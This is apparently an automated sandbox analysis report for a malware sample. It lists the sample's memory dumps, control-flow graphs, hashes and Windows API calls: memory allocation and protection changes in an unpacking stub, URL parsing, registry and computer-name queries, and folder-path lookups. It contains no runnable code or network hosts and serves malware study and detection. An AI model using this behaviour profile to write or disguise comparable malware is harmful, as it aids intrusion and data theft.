                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
                                                              • String ID:
                                                              • API String ID: 1337183907-0
                                                              • Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                              • Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
                                                              • Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                              • Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                              • Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
                                                              • Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                              • Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2428 247003c-2470047 2429 247004c-2470263 call 2470a3f call 2470e0f call 2470d90 VirtualAlloc 2428->2429 2430 2470049 2428->2430 2445 2470265-2470289 call 2470a69 2429->2445 2446 247028b-2470292 2429->2446 2430->2429 2451 24702ce-24703c2 VirtualProtect call 2470cce call 2470ce7 2445->2451 2448 24702a1-24702b0 2446->2448 2450 24702b2-24702cc 2448->2450 2448->2451 2450->2448 2457 24703d1-24703e0 2451->2457 2458 24703e2-2470437 call 2470ce7 2457->2458 2459 2470439-24704b8 VirtualFree 2457->2459 2458->2457 2461 24705f4-24705fe 2459->2461 2462 24704be-24704cd 2459->2462 2463 2470604-247060d 2461->2463 2464 247077f-2470789 2461->2464 2466 24704d3-24704dd 2462->2466 2463->2464 2467 2470613-2470637 2463->2467 2470 24707a6-24707b0 2464->2470 2471 247078b-24707a3 2464->2471 2466->2461 2469 24704e3-2470505 2466->2469 2474 247063e-2470648 2467->2474 2478 2470517-2470520 2469->2478 2479 2470507-2470515 2469->2479 2472 24707b6-24707cb 2470->2472 2473 247086e-24708be LoadLibraryA 2470->2473 2471->2470 2475 24707d2-24707d5 2472->2475 2483 24708c7-24708f9 2473->2483 2474->2464 2476 247064e-247065a 2474->2476 2480 24707d7-24707e0 2475->2480 2481 2470824-2470833 2475->2481 2476->2464 2482 2470660-247066a 2476->2482 2484 2470526-2470547 2478->2484 2479->2484 2485 24707e4-2470822 2480->2485 2486 24707e2 2480->2486 2488 2470839-247083c 2481->2488 2487 247067a-2470689 2482->2487 2489 2470902-247091d 2483->2489 2490 24708fb-2470901 2483->2490 2491 247054d-2470550 2484->2491 2485->2475 2486->2481 2492 2470750-247077a 2487->2492 2493 247068f-24706b2 2487->2493 2488->2473 2494 247083e-2470847 2488->2494 2490->2489 2496 2470556-247056b 2491->2496 2497 24705e0-24705ef 2491->2497 2492->2474 2498 24706b4-24706ed 2493->2498 2499 24706ef-24706fc 2493->2499 2500 247084b-247086c 2494->2500 2501 2470849 2494->2501 2502 247056f-247057a 2496->2502 2503 247056d 2496->2503 2497->2466 2498->2499 2504 24706fe-2470748 2499->2504 2505 247074b 2499->2505 2500->2488 2501->2473 2506 247057c-2470599 2502->2506 2507 247059b-24705bb 2502->2507 2503->2497 2504->2505 2505->2487 2512 24705bd-24705db 2506->2512 2507->2512 2512->2491
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0247024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2513 404ae0-404aee 2514 404af0-404af5 2513->2514 2514->2514 2515 404af7-404b68 ??2@YAPAXI@Z * 3 lstrlenA InternetCrackUrlA call 402930 2514->2515
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000800,00A0BC18), ref: 00404B17
                                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
                                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
                                                              • lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
                                                              • InternetCrackUrlA.WININET(?,00000000), ref: 00404B47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$CrackInternetlstrlen
                                                              • String ID: <
                                                              • API String ID: 1683549937-4251816714
                                                              • Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                              • Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
                                                              • Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
                                                              • Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2518 4228b0-4228f3 GetProcessHeap HeapAlloc RegOpenKeyExA 2519 4228f5-422905 RegQueryValueExA 2518->2519 2520 42290b-42291e RegCloseKey 2518->2520 2519->2520 2521 422920-42292f 2520->2521 2522 422931-422934 2520->2522 2521->2521 2521->2522
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                              • HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                              • RegOpenKeyExA.KERNEL32(80000002,009E97A0,00000000,00020119,00422849), ref: 004228EB
                                                              • RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                              • RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                              • String ID: CurrentBuildNumber
                                                              • API String ID: 3466090806-1022791448
                                                              • Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                              • Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
                                                              • Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                              • Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2523 422820-42284e GetProcessHeap HeapAlloc call 4228b0 2526 422850-422859 2523->2526 2527 42285a-422879 RegOpenKeyExA 2523->2527 2528 422892-4228a2 RegCloseKey 2527->2528 2529 42287b-42288c RegQueryValueExA 2527->2529 2529->2528
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0042283C
                                                                • Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
                                                                • Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
                                                                • Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,009E97A0,00000000,00020119,00422849), ref: 004228EB
                                                                • Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
                                                                • Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F
                                                              • RegOpenKeyExA.KERNEL32(80000002,009E97A0,00000000,00020119,?), ref: 00422871
                                                              • RegQueryValueExA.KERNEL32(?,00A0E680,00000000,00000000,00000000,000000FF), ref: 0042288C
                                                              • RegCloseKey.ADVAPI32(?), ref: 00422896
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                              • String ID: Windows 11
                                                              • API String ID: 3466090806-2517555085
                                                              • Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                              • Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
                                                              • Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                              • Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041F013
                                                              • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
                                                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID: ERROR
                                                              • API String ID: 3722407311-2861137601
                                                              • Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
                                                              • Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
                                                              • Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
                                                              • Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocComputerNameProcess
                                                              • String ID:
                                                              • API String ID: 4203777966-0
                                                              • Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
                                                              • Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
                                                              • Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
                                                              • Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009EE5EE
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 009EE60E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9ed000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: d05ae32c680828f4e274e87cf17e5fe563e66c18afe98a4458a86999640ac312
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 9BF09631200755AFD7313BF6AC8DB6E76ECAF99725F100528F646914C0DB70EC454A61
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000400,?,?,02470223,?,?), ref: 02470E19
                                                              • SetErrorMode.KERNEL32(00000000,?,?,02470223,?,?), ref: 02470E1E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: df7174f9f57e46548dd531f3c2dfcdef14bbfe03a49bac81fa522fe882d0dbf2
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 22D0123114512877D7002A94DC09BCE7B1CDF09B66F008011FB0DD9180C770954046E5
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
                                                              • Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
                                                              • Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
                                                              • Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009EE2D6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_9ed000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 785defa48ff7a85d7394caf1d5d4d66becb50b8336be9291bd79491ea2f1dad4
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: AB112B79A00208EFDB01DF99C985E98BBF5AF08351F058094F9489B362D771EE50EB80
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471849
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471880
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024718D3
                                                              • lstrcat.KERNEL32(00000000), ref: 024718DD
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471909
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471956
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471960
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0247198C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024719DC
                                                              • lstrcat.KERNEL32(00000000), ref: 024719E6
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471A12
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471A5A
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471A65
                                                              • lstrlen.KERNEL32(00431D64), ref: 02471A70
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471A90
                                                              • lstrcat.KERNEL32(00000000,00431D64), ref: 02471A9C
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471AC2
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471ACD
                                                              • lstrlen.KERNEL32(00431D68), ref: 02471AD8
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471AF5
                                                              • lstrcat.KERNEL32(00000000,00431D68), ref: 02471B01
                                                                • Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
                                                                • Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471B2A
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471B75
